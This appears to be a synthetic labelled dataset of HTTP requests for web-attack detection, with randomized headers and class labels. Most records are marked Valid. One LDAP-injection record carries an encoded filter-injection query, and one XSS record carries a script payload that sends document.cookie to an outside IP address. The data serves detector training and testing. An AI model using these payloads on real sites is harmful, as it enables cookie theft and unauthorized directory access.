GET /in5D2Yca/zJK3L_V/sOsg4QcJ/dZRVyxOthjd.pOTxly/uif_m13g.zylie3/abVoryXYViZJbnMEGb./ULMgl6zOB7OMI4./Ne6rO./4invytwM2XPwiaV_H0/oh0eR8NSIBr/QI/rnkrteMk.exe?gPiL5H3tmp=ilttvexec&h8atETanez=019437 HTTP/1.1
Host: www.animeno.net
Connection: close
Accept: video/quicktime;q=0.2, audio/basic;q=0.7
Accept-Charset: iso-8859-5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 31.16.41.72
Cookie: ht=a1exec;bneebtr4Unherma=46140460;cxAoVadt=o'S]r8tvlteisbetweenA%etce%E;tTsthpTcnxssSgo=he ;eaaarO=pt)e
Cookie2: $Version="43"
Date: Sat, 26 Jun 04 14:04:04 UTC
ETag: "dvq2t6rH3wBPA0V"
Expect: 100-continue
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Sat, 19 Mar 05 06:47:43 CET
If-Unmodified-Since: Sun, 26 Nov 06 12:59:42 CET
If-Match: "0y4sQZ8W3jhxs7D7W4"
If-None-Match: "djgfRYjcNmCd5g634v"
If-Range: "lG-MQOYlEZAig4W8aO8O"
Max-Forwards: 8759
MIME-Version: 5.4
Pragma: garnCt1=phfxeetN
Proxy-Authorization: Basic YXV1MVNpOmVhM2F1ZW8=
Authorization: Digest qop=auth-int
Range: 37-,-5477
Referer: /vdlefmoh/s2Ftsnlh/fis1zo/t8Eh0e.pl
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: aoCyJN5FXq http://www.keafa.com
UA-CPU: x86
UA-Disp: 191,321,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 767x833
Via: sett2/3.8 www.eeyzuk43.png
Transfer-Encoding: identity
Upgrade: tlf/0.4, Emuy/3.9, ies/1.0, bdb/2.4
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 102.122.239.98
X-Serial-Number: 4331077002
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21628
Start - Id: 17633
class: Valid
GET /0l/slcnhonNlttr/ij0EBi1JmoUK/sQLmH8ZEhT8zcWz9cB/kqut5IFxp_8KxS-.png?mitnnd=Ztn%3Au&trahh9ie9S9et=377&m2nwaulp1thhar=hoaunqirank8&HBvadminWzkokN=eoYo&afTnssn=c%3E&atan=6&eczo=+cuecho5dno%3C&easa=h87H_YR&l5s1ri7e7gxc=nS&lskI-wgetP4RB=lalle&snobneqcAeeai=6206199&nH=L+n+IakadtilfeEa%26qja&eldEU=72377361&R4awurrqdceSewe=13771348&ArYlut9tuns=8UZ_y HTTP/1.1
Host: 95.30.94.177
Connection: gLzeuk
Accept: */*
Accept-Charset: windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-age=4401
Client-ip: 100.53.143.122
Cookie: esnepsei00d2a=o=oej;rcphOb7aenuhr0D=loehtpassashrqst>t;r7tniAgosy9d=pAa3oEbe;Cthrjhxoitdx=tU0FG
Cookie2: $Version="65"
Date: Sun, 21 Mar 10 22:42:28 GMT
ETag: "DJCqJurVPqjQ5b522q"
Expect: gm2utTo
From: rtRao@6Hhrnh.cz
If-Modified-Since: Sun, 30 Nov 08 03:19:30 CET
If-Unmodified-Since: Sat, 01 Oct 05 15:39:58 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Jan 05 15:35:15 GMT
Max-Forwards: 8439
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest uri=/es8l/nttoxe/eDstt/tmGes/lkes.msf
Authorization: 4qlo s67bt=6pnC
Range: -948
Referer: /sfseatk6.sh
TE: chunked;q=0.1
Trailer: If-Range
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 2.8; zf-so; rv:8.7.9) Gecko/36754285
UA-CPU: MIPS
UA-Disp: 611,8955,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 519x8664
Via: 5.1 226.135.139.33, FTP/6.7 71.110.185.205
Transfer-Encoding: tnyp; iaipbn3O=5indmbiL
Upgrade: lt0fe/9.6, eihftp/6.4, hrd/6.0, kRb7mx/7.0
Warning: 037 www.tflm.htm:40429 "fajas1yd" 
X-Forwarded-For: 9.161.93.196
X-Serial-Number: 6572400
----: --------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 17633
Start - Id: 30520
class: Valid
GET /O-BQw84Fz_npositionllV/odeFf8atdmm/iQ/q.4b/Q_ce/np-Gy/st85h2m/EiheideEvie/w7acu-W2wRaDsOVFh/hzmM/nvDun0EoWJDaQA/4AXMLZtkjk@gzoaH.asp?zN4uq8cesl=le%40l1t0snb&etusulehoyooe36=N+abeh%3F%25oq65ver&6ilouljbnamaes=oeJb&enitrw=%3Cwpp&ra=7705753&QW@h4ZFinputo=vx5-C-O&ru3cAjphp5tnullp=Ud2dp5&z3nj3=4AOselectlinkechoe%3Eb&E7lnoaAsw=l%3DY&eu=5rde6zaIyvvon9yf HTTP/1.0
Host: www.nbodeeus4.net
Connection: keep-alive
Accept: video/*, application/*, audio/*
Accept-Charset: iso-8859-7;q=0.7, x-mac-japanese
Accept-Encoding: 
Accept-Language: lot-pncm4as, r-witS, m-0i
Cache-Control: htmrnlti='lr'
Client-ip: 45.61.175.245
Cookie: RF5M0Q5libwv=18;m0hS6=ti.lAubmgg4Z;7hsttn=r8n;rwx8sa4lqcd= 3di
Cookie2: $Version="21"
Date: Mon, 08 Dec 08 14:38:40 UTC
ETag: "gAoh1dXS@b.aUzyorSs"
Expect: hseef1s=i5gaS
From: zzlwh@fLsr.de
If-Modified-Since: Sun, 22 Jan 06 03:22:18 CET
If-Unmodified-Since: Tue, 01 Nov 05 08:17:33 GMT
If-Match: *
If-None-Match: "D6ux-b_S_T.jDLIkL5Bi"
If-Range: Tue, 31 Aug 04 11:38:35 GMT
Max-Forwards: 870
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic ZWUzcmk6ZW9oN2Vk
Authorization: Basic aGljd2FldDpocmF1ZXBhYQ==
Range: 6-,-0
Referer: http://he5nm.uk/tpniOij/eddnireh/0i4v/y0edeoeL.ace
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.7 (Windows; U; Win98 2.3; 9n-md; rv:4.3.5) Gecko/46959124
UA-CPU: 68000
UA-Disp: 243,6235,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 848x9139
Via: vetdsn/7.3 10.87.225.35, hset/0.0 www.t7osgs.png, 0.4 65.75.190.47
Transfer-Encoding: gzip
Upgrade: 5rir/1.2, ag6/9.0, lli/9.6, ihcn/5.0
Warning: 154 95.111.78.82 "snmChTa3n" 
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30520
Start - Id: 37920
class: LdapInjection
GET /nkaiMoelegnwjnNrmlc/5z9pObnm5Saumn-sw/juY4FC.mspx?rssl3qnuhK=%29++%28+%7C+%28cn%3D*o++%27brien*++%29%28mail+++%3D*o+%27brien*%29+++ HTTP/1.0
Host: www.soakrfim.fr
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-7;q=0.2, windows-1257;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: ocR8b9fr-eiaahti;q=0.4
Cache-Control: only-if-cached
Client-ip: 223.210.28.59
Cookie: henEatxs=yM-e.mwS0.;g1y3hhBLUoaadmin=reeo;hyqteuapoog=27;agh0rdfdKnaete=9739
Cookie2: $Version="988"
Date: Mon, 13 Aug 07 15:53:01 UTC
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: Eoel=5enbA;joo0
From: ssir@wcooTie.net
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Wed, 15 Dec 04 06:22:33 GMT
If-Match: *
If-None-Match: "GbVs1amUiJ9h-9Hn0"
If-Range: "rmUzG-z4owfuX9cIyerf"
Max-Forwards: 6303
MIME-Version: 2.1
Pragma: h='n'
Proxy-Authorization: vLiie9 isIdet=nyae4rtc
Authorization: Basic ZWx3NW5TNTpQZWxzc3c=
Range: 55502-651
Referer: http://hooea.de/fp95t/lc3d.bin
TE: deflate
Trailer: TE
User-Agent: sDwLsfl
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: tTeb/3.4 www.lhOntHy.js, FTP/3.6 150.27.48.170, 5.9 www.NahDl.shtml
Transfer-Encoding: gzip
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37920
Start - Id: 4744
class: Valid
POST /jeUossucnpp06tle/HaIMCPzF8/r7HHlB5.jsp? HTTP/1.0
Content-Length: 18
Content-Language: cF4dyO,j7ncl5,ejte
Content-Encoding: gzip
Content-Location: /e6sjodhe/eooga.mdb
Content-MD5: cmlvaXI3dHNIaGNlU3k2ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 16 Mar 06 19:32:42 GMT
Last-Modified: Fri, 09 Jul 04 14:30:48 GMT
Host: 32.234.229.127
Connection: close
Accept: text/xml;q=0.0, audio/*;q=0.2, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: 9-W;q=0.0, e3-ggekadh;q=0.5, eziyeu-r, y7o-aed
Cache-Control: max-age=1529
Client-ip: 133.157.176.125
Cookie: Waaenr6onrl=th;pBewgetTatf@N=shwsajs;lc=aGFYKv.MfG;remtqiha=a4Lfanjg8pe9lvei
Cookie2: $Version="03"
Date: Sat, 22 Jan 05 03:20:21 CET
ETag: W/"WPn_1BVIeo3XgPPkj"
Expect: e2gZ
From: oetmfrha@shu54hnaa4.uk
If-Modified-Since: Wed, 20 Jun 07 24:41:59 UTC
If-Unmodified-Since: Wed, 26 Nov 08 01:34:19 GMT
If-Match: "h@pNAlWIlBvjehURlzt"
If-None-Match: *
If-Range: Mon, 06 Jul 09 23:30:50 GMT
Max-Forwards: 3235
MIME-Version: 6.2
Pragma: d='c'
Proxy-Authorization: Digest opaque="rll9"
Authorization: Basic czhjZXQ6OGw1cmF0OA==
Range: -9054
Referer: /firl/lerma1/7wffuos/jshedah8.doc
TE: gzip,trailers,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 6.9; eo-tn; rv:7.1.7) Gecko/05361184
UA-CPU: MIPS
UA-Disp: 035,213,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4366x138
Via: FTP/8.7 123.242.72.77, 1.0 www.rhafs8.css:05, 2.4 www.cytd.css
Transfer-Encoding: identity
Upgrade: gto1/9.1, noos/2.9, su2trm/7.6, u0Ntk/3.5
Warning: 345 18.66.75.142 "egj3Lsf4olmsnle" 
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 07250017446349545353
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lneauoReicneae=827

End - Id: 4744
Start - Id: 13617
class: Valid
GET /sQ_Bh/t_dsGCb_4H6Ex/Sv/nrl9mlmIte/@IDX_ahomeZsfTuwiV/eP4-OXUQjSl9v/PvNEFUAinputzfzc.bin?nwe6ea1oa=D+eim+RH+m5ti&ypstvvhbmshh0oz=10166&axTeoaCr=icxcs&sygMsab8hOT2hi=9&tsrre6xdrwidis=ns5d&eA5reVaceho=26&E95oiv=nrotYephpne%29cteN&mspenyes=206029&scoeesHa=647487&iit=f%29be&3eaa=nu_bn30AwpMv&m1=thh&lns8mnigGEd0et=er8dTuepaiwomaoEp HTTP/1.0
Host: www.0oiWnEreh.de
Connection: hJlEor
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 8.130.228.105
Cookie: emcrttnesru= Yuin;sohx=iuwEda5aersueEr;the=ej50p8m;u1nt=ouna;vbscriptVaCCxeAm=08;abd=s97hmybi
Cookie2: $Version="4"
Date: Sun, 23 Dec 07 10:44:10 CET
ETag: "y_edEifPYWE54zi-v"
Expect: 5Eds=8ltlnft8
From: ednsif0g@o99ssn.be
If-Modified-Since: Mon, 14 Jun 04 03:33:24 UTC
If-Unmodified-Since: Wed, 23 Mar 05 05:26:49 GMT
If-Match: *
If-None-Match: "F6jYmY43fPdawnDppn"
If-Range: *
Max-Forwards: 4
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: piudr oacenst=u98ae
Authorization: Digest qop=utuyieA
Range: 91-
Referer: /t5bpfugt/fxcA1Tbr/Reldet7.tar.gz
TE: gzip
Trailer: From
User-Agent: Mozilla/0.0 (X11; U; Open BSD i586 0.2; 04-s0; rv:1.3.8) Gecko/56663502
UA-CPU: PowerPC
UA-Disp: 0811,7383,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1926x6601
Via: iSg/0.3 207.240.140.149, 0.6 114.56.93.177, FTP/9.6 www.tyttdli.jpeg
Transfer-Encoding: identity
Upgrade: xAwDhi/6.3, egwu/9.7
Warning: 807 133.152.207.209 "sun7es0tar" "Fri, 06 Apr 07 02:15:41 CET"
X-Forwarded-For: 48.26.121.103
X-Serial-Number: 5747927259472661
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13617
Start - Id: 3657
class: Valid
GET /7edrnj6b8raahh/TorIBF/2WzfunPqQ.sOR/b5es8noixd7lorte0/gtuieiticQdwiga9us/e9WW3s8LogxAe/hgri/eW-sBxN04m/s_t.gif?ZdobetweenOSKRzdc=Tftjhz%2Bfc%5Del&eetanhgratcvd=tsehoifCaemqths HTTP/1.1
Host: 142.137.17.142
Connection: close
Accept: */*;q=0.2
Accept-Charset: windows-1250;q=0.2, iso-2022-jp;q=0.5, iso-8859-6
Accept-Encoding: compress;q=0.1, identity, gzip, identity, gzip
Accept-Language: tcalx-2una;q=0.3
Cache-Control: only-if-cached
Client-ip: 208.5.177.174
Cookie: aYrogNnDr=ekhr9cjk$Ehp9@t;toi7eiznthfh=Cemni/ta;iiRJnehgtE=229;fzie2lhLam9ip=copP;30et=booal1fwmm;pTaaU=3Esgl8eOotzgt
Cookie2: $Version="44"
Date: Sun, 14 Jun 09 12:10:05 UTC
ETag: "lgCZs8ZkMKUQe-8on"
Expect: 100-continue
From: uetbhi3r@tchnocl.uk
If-Modified-Since: Mon, 02 Jan 06 03:08:42 GMT
If-Unmodified-Since: Thu, 23 Dec 04 20:56:04 CET
If-Match: "jsQafliL-IjrZWK9n"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic bnJudXQ6b2VlMQ==
Authorization: NTLM bzJub2R0Y25TMWVtZTZpcTVzc3JlZW5jbExyYW50dG5tb2FvaHRreWlTN2Vy
Range: 266128-
Referer: http://eT7ta.ch/eiffqli.ace
TE: chunked;q=0.7
Trailer: If-Unmodified-Since
User-Agent: eanioe4 (tmP@aC@j7.; e_qdjoV0a6; a5FOYKNSN)
UA-CPU: StrongARM
UA-Disp: 1100,347,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1057x068
Via: bzhz/1.9 205.126.209.81, HTTP/2.5 220.194.101.159:1
Transfer-Encoding: compress
Upgrade: avrfan/8.7, eJt/9.9, Nel/3.2, 7dssn/4.1
Warning: 615 www.rhpe.shtml "litiIofi1" 
X-Forwarded-For: 153.114.223.45
X-Serial-Number: 760698596875297
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3657
Start - Id: 16557
class: Valid
GET /rtjtdasrrD/vo/eenyi6h1/aVk@/8P_rebm48K.OQw@Ia/Pesurmeuhsstn/ssYH4BJURgZJGc/yetna/naunohhx0aamwbb/e5y816FwKmjFfbV/kftrea4nvrkAFy/arprwqmaeayselsmota.mdb? HTTP/1.1
Host: www.haspuo.uk
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew, windows-1251;q=0.8, x-mac-turkish, x-mac-greek;q=0.3, hz-gb-2312;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 110.75.170.196
Cookie: eje1sebutacE=8
Cookie2: $Version="756"
Date: Sun, 16 Nov 08 11:20:52 CET
ETag: "N9OzobOJ5WrCIQW2"
Expect: anso=emn1tqz
From: o7mnatoB@rrengt.ch
If-Modified-Since: Wed, 17 Jun 09 05:18:05 CET
If-Unmodified-Since: Thu, 18 Nov 04 08:36:01 CET
If-Match: *
If-None-Match: "6fACpCMRfTf.qmKwu"
If-Range: "RaQU8G0M-4V5bcA9J"
Max-Forwards: 9
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM YWllc2F0MWFzbGUzaFJuZWN1d3FmYW1SdE9lUGNkUGVlZ29vb2lnYXd0OG5lYw==
Authorization: Basic dE9lNDptNG4yeA==
Range: -098113
Referer: http://www.eNpim.gov/luet/amhzea/m0yr/tt2Ah.gif
TE: deflate;q=0.6
Trailer: If-Range
User-Agent: lr9gt/9.5.6.9
UA-CPU: x86
UA-Disp: 2808,9760,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9430x4545
Via: HTTP/4.0 www.Dlvh.jpeg:09, HTTP/5.5 61.167.52.176
Transfer-Encoding: eo5i
Upgrade: ere0/9.6
Warning: 574 www.ragnqoh.htm "mte2te" 
X-Forwarded-For: 184.226.48.9
X-Serial-Number: 4070028617537255
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16557
Start - Id: 47559
class: XSS
GET /netcatcVrzaccess_logwjeUt1iframe/skCsHt/c2q9pcEkAdOYTIp/ytiT/iaCn_Is7plu/wec4uedceieCdnOlB/apdI/eZiL7YjJXoI5c2rf/aschoiif/j17Drohcbde/paoireDCehqr/sdfyKgyHigB27ho.dll?el1e=271&rduArm75o=ptmp&itXeverr3eih=duhpctp7258lae&Oojd=2&ituh9vnbnro=%3Cstyle+++%3E%3C%21--%3C%2Fstyle+++%3E%3Cscript+++%3E%5Bwindow.open%28%27http%3A%2F%2F23.103.13.17%2Fon.php4%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+++%3E&dzmeotyr7eyFia=dfg826 HTTP/1.1
Host: 240.142.141.96
Connection: ggeeo
Accept: audio/*
Accept-Charset: x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 19.138.115.203
Cookie: aeyeiW=e-ugi>us5ho;ns0oyeegiraeHte=eEce;eam=ds;rbsre1s=hemwpEaitozae4;t1hted=139;1vgxeta6hepltol=:l
Cookie2: $Version="143"
Date: Tue, 04 Mar 08 12:53:48 UTC
ETag: W/"mnlD0W_rb0q3uSd5D"
Expect: snnoir=adltaio;te7rrx=Jsofg
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Tue, 18 Apr 06 09:58:17 CET
If-Unmodified-Since: Sun, 09 Aug 09 16:54:39 GMT
If-Match: *
If-None-Match: "jqvrFjIShiJkSuVRclO"
If-Range: Thu, 11 Sep 08 02:35:12 GMT
Max-Forwards: 2
MIME-Version: 3.1
Pragma: toidir=AtewQr5
Proxy-Authorization: Basic aXR0RWVsZmI6YXRyZ2Ru
Authorization: Basic bkFzcjp0anRkYw==
Range: 946-214738,54330-8
Referer: /hyeluh7h/2Vat/Em1aie/ebcds.php3
TE: deflate,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.8 (X11; U; Linux i386 9.1; rf-28; rv:2.7.5) Gecko/99420876
UA-CPU: x86
UA-Disp: 2727,829,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 417x368
Via: didcT/9.6 0.176.48.211, HTTP/2.2 www.nsesac.png:7082, 6.7 www.ohiNar.html
Transfer-Encoding: gzip
Upgrade: nqne/3.2
Warning: 992 177.149.214.21:27 "ihta" 
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 57604389
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47559
Start - Id: 4595
class: Valid
PUT /LH79ueDHaBp_c/zL@j/tmp79i/K0xfuPsR/w.45zqw.8UN5e2/nr/l.i2O6Ivjku@dJ/a4p.nsf? HTTP/1.1
Content-Length: 156
Content-Language: sn
Content-Encoding: identity
Content-Location: /nprGnbwi.fgf
Content-MD5: M2VzYWFlZElsUXI2WWFudQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Aug 06 15:45:51 GMT
Last-Modified: Thu, 25 Dec 08 15:04:39 UTC
Host: 18.195.37.72:353
Connection: keep-alive
Accept: audio/x-wav;q=0.2
Accept-Charset: x-mac-cyrillic
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.7
Cache-Control: gtg=iud
Client-ip: 215.243.176.32
Cookie: 8f3ra=0;ai=uNywxdeletehed1 nlogetcnfie;g5emgqh5yiheays=mjKH_g7LECm;ef=rselects0i~e Bace
Cookie2: $Version="893"
Date: Wed, 20 Aug 08 16:51:31 GMT
ETag: "INfmsIVxEaEeGNgj3"
Expect: 100-continue
From: eeach9o@lShsfeuHa.it
If-Modified-Since: Tue, 10 Mar 09 10:41:29 UTC
If-Unmodified-Since: Wed, 12 Apr 06 11:05:30 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Nov 09 10:33:09 GMT
Max-Forwards: 2
MIME-Version: 9.2
Pragma: ns=hrtftr
Proxy-Authorization: teumgr jelesoT=moa4d
Authorization: Digest opaque="iMqn"
Range: -6763
Referer: /ltJitn.css
TE: chunked,gzip,deflate
Trailer: Connection
User-Agent: EnHhraeeei (eigWFKAn; mi2HTi7; 0Ync.WT3tK; 1mlZQCw; hEdZLc8f)
UA-CPU: StrongARM
UA-Disp: 456,796,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 2066x525
Via: FTP/8.9 www.ytgec1.css:09906, 8.2 www.fe4ef.js, HTTP/6.3 135.149.173.142
Transfer-Encoding: compress
Upgrade: ixu/5.5
Warning: 988 151.125.214.127 "gfUrsdmemsEuarg" 
X-Forwarded-For: 210.240.131.9
X-Serial-Number: 9967522166
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

shMc=eeTsctc7iaks&nDsedlQl=oBallrYc+Smawoy&ynvtduH=ti&MnP=a2opt&sissZosn=a0olldautoexec&icciMpcf=02395378&l5ddlu3cnn=txm0oPBFcCm&XVuh_1NMg=behoea5i0TnUs2s

End - Id: 4595
Start - Id: 33381
class: Valid
PUT /nV47BkEm/iyCvG0n.Ykm@X/b_KKx/8zfTl/tsgldaetthxoniht/fD9PFBm5qIYT.gif? HTTP/1.0
Content-Length: 67
Content-Language: dih,vts3aee,2ryqYitr
Content-Encoding: identity
Content-Location: http://www.Daehv.be/3nCea.ace
Content-MD5: ZG1lOFI4RWdhMkVMaHRrZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Mar 10 20:49:17 CET
Last-Modified: Wed, 28 Dec 05 24:37:53 CET
Host: www.ttySrc3k.cz
Connection: 662lb6
Accept: */*;q=0.4
Accept-Charset: iso-8859-8, windows-1253, x-mac-chinesesimp;q=0.3, shift_jis, windows-1250
Accept-Encoding: 
Accept-Language: wcTa-ae67wNb;q=0.6, yaiEqe-fntTia
Cache-Control: max-age=09296
Client-ip: 29.250.171.112
Cookie: iZPr=cN2hnh1B;tlycia0dnetqpm=mOyUW
Cookie2: $Version="56"
Date: Wed, 02 Aug 06 13:16:38 UTC
ETag: W/"c@Scju_I1DK2y7qy"
Expect: iehe=gtcE6
From: 3ton@bihnHawNg.be
If-Modified-Since: Fri, 14 Sep 07 14:26:28 UTC
If-Unmodified-Since: Wed, 11 Oct 06 15:17:01 UTC
If-Match: *
If-None-Match: "rLxAgrYU4XJeKme2y"
If-Range: Sat, 10 Apr 04 17:15:38 UTC
Max-Forwards: 053
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Basic ZWlnck1oZXQ6eXNVbnZyZQ==
Authorization: Digest algorithm=MD5
Range: 7289-656,71-060150
Referer: /cadwsHdl/ld4s/fcatqihw/oeorb3ti.tar
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/0.1 (X11; U; Solaris 4.4; et-Et; rv:0.3.9) Gecko/00500702
UA-CPU: 68000
UA-Disp: 987,602,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3714x6076
Via: 2.2 www.aryEOsUc.htm, 7.9 www.nnnsa.jpeg, 6.8 www.h1uheS.js:2
Transfer-Encoding: 5lhnnr
Upgrade: hix3/8.0, Imde/9.7, cyao/6.6, etnO8n/7.1
Warning: 083 www.fspp3om.jpeg "iC94etihocgcee3e" 
X-Forwarded-For: 55.13.186.67
X-Serial-Number: 93235551323019151899
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ns8h1s=:&owyewde=055641&mssEnu=m&onIhedd=|5&mruo=ao-oyOwIOS@x

End - Id: 33381
Start - Id: 30857
class: Valid
GET /hhdeotew/h8vabfddtaLnAe2ehhn/eEcsm5l/r8297k6TWY/1ywIio/6psae.htm? HTTP/1.0
Host: 95.147.220.111:40
Connection: close
Accept: audio/basic;q=0.5, video/*;q=0.5, text/*;q=0.9
Accept-Charset: euc-kr;q=0.6
Accept-Encoding: deflate;q=0.9, gzip;q=0.4, deflate, deflate, identity;q=0.2
Accept-Language: d-eMalm;q=0.5, itrOt-tbelcode, sllesin-hs7;q=0.1
Cache-Control: max-stale=24
Client-ip: 14.171.42.54
Cookie: 3feoeo=ogeHCGaJ_;7imb3n=et5sse;lnlhdtX=seem
Cookie2: $Version="1"
Date: Thu, 19 Apr 07 07:54:23 UTC
ETag: "Pt4WExpBh9WLiP0"
Expect: Pelt=bhiA;tfaIsw
From: uqfre@ho0adaw.st
If-Modified-Since: Fri, 19 Feb 10 20:17:04 UTC
If-Unmodified-Since: Wed, 14 Jul 04 05:56:33 GMT
If-Match: "QCTOrByAfEeTzZX5D"
If-None-Match: "qtSnj1-wmNVWq5F5D8fN"
If-Range: *
Max-Forwards: 27
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM bXJvbmFqZW5ocnIxZWk0bXRscHVsdW81c2VzY3JVb2Vsb3I=
Authorization: Basic NUhuOTp0bWRlbTNlcQ==
Range: 34-99706,31-
Referer: /xtbnS/aoie/iahgste/sbeLn.msf
TE: trailers,trailers
Trailer: Connection
User-Agent: HtfecrsdeeieoWnci5ao
UA-CPU: StrongARM
UA-Disp: 072,6639,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1014x4541
Via: 6.9 www.vEdgwnar.jpeg, 6.5 www.osvNlw.shtml
Transfer-Encoding: 7ema5i; iniRim2=irbg
Upgrade: tta/7.0, 4eqe/3.0, anE/5.0, icyrc/8.3
Warning: 566 242.196.69.169 "iessyats7Iobn" 
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 5586644742
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30857
Start - Id: 14660
class: Valid
GET /EHvO0/ntcttyorsehtt/nmnju06CY4OR_hvRiE/oAIyBPKL_IgNC/zgpQV6Mm3q/oaqehkeso59a/dM6GoQa_d/wnhtaccesPKwYeET8/oc/nSdnrNtlirtbsmbia/nDOAuRwi/eh1fdYhat1an82sOl.html?libXf2rHoZeval=%3C&tithlMIsL=yQj-2rTaJ HTTP/1.1
Host: 202.21.167.180
Connection: close
Accept: video/*;q=0.6, video/*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: Lb5n-tohGnInn
Cache-Control: e='stdruaa'
Client-ip: 8.162.62.163
Cookie: wweauhmeinet=niA0de;YUExwZyetc_=mtr;3drgtdepBnraDof=child4hrdeoevsTd;hsmric=i8O
Cookie2: $Version="8"
Date: Mon, 12 Sep 05 09:10:50 GMT
ETag: W/"PITj1mQvtEC@Wib"
Expect: 100-continue
From: ew4dDBs@eoeatshefo.uk
If-Modified-Since: Fri, 09 May 08 06:44:33 GMT
If-Unmodified-Since: Sat, 03 Jan 04 21:55:22 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.9
Pragma: xtibeRra='0nse0qs'
Proxy-Authorization: ijwut osgnals=mtekhgsY
Authorization: Basic aXRlbjp0NmVtaQ==
Range: -471335
Referer: /merTyEe.jsp
TE: trailers,gzip;q=0.5,trailers
Trailer: Transfer-Encoding
User-Agent: iJ8eutzwT http://www.esdcdsc.gov
UA-CPU: StrongARM
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 9242x520
Via: 2.9 www.iaevxrdC.tiff
Transfer-Encoding: deflate
Upgrade: iinxrh/1.1, rd9/9.8, kohAe/3.0, cvw/1.2
Warning: 665 25.112.130.36 "tuc2tunjTsnat" 
X-Forwarded-For: 221.36.251.127
X-Serial-Number: 77243596872143815
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14660
Start - Id: 25627
class: Valid
